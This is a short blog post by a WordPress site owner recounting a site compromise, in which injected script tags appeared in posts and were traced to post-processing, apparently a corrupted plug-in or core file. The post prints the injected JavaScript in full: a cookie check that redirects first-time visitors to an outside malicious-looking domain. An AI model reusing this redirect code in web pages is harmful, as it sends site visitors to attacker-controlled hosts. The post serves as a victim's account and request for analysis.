Malware Attack? Well, that was fun.

Posted on Posted in Eng/Sci/Tech

Thanks to the ever quick eye of Google, I found out that someone in the past 24 hours added an HTML script tag to several of my posts. It took me awhile to find, but thanks to Google’s Webmaster Tools, I located the script tags and removed them. I’m not sure how they managed to place them there, but I’ve decided to play it safe and change my login to my secondary password which meets Army IT standards.

If anyone knows scripting, they’re welcome to try and explain to me what the following code does:

function secooe(c_name,value,epiedas){
var exdate=new Date();
exdate.setDate(exdate.getDate()+epiedas);
document.cookie=c_name+ "=" +escape(value)+
((epiedas==null) ? "" : ";expires="+exdate.toGMTString());
}

function getCookie(c_name){
if (document.cookie.length>0)
{
cstatr=document.cookie.indexOf(c_name + "=");
if (cstatr!=-1)
{
cstatr=cstatr + c_name.length+1;
c_end=document.cookie.indexOf(";",cstatr);
if (c_end==-1) c_end=document.cookie.length;
return unescape(document.cookie.substring(cstatr,c_end));
}
}
return "";
}

var name=getCookie("pma_visited_theme2");
if (name==""){
secooe("pma_visited_theme2","1",20);
var url="http://127dgsavhcxy23.oeema.info/in2.php?n=508102";
window.top.location.replace(url);
}else{

}

UPDATE: The scripting tags reappeared a few days later, so I had to devote a bit more time to this problem. After examining the MySQL databases, I realized that the attack was not through the front end (i.e. someone getting into WordPress and pasting “[evil, maliscious script. muahaha]” directly into my posts). My posts saved in the database were clean. That meant that someone was adding the malware/script tags in “post processing,” probably through a corrupted plug-in or core file in WordPress. I reinstalled WordPress and pruned back my plug-ins. Time will tell if I triumphed.

Leave a Reply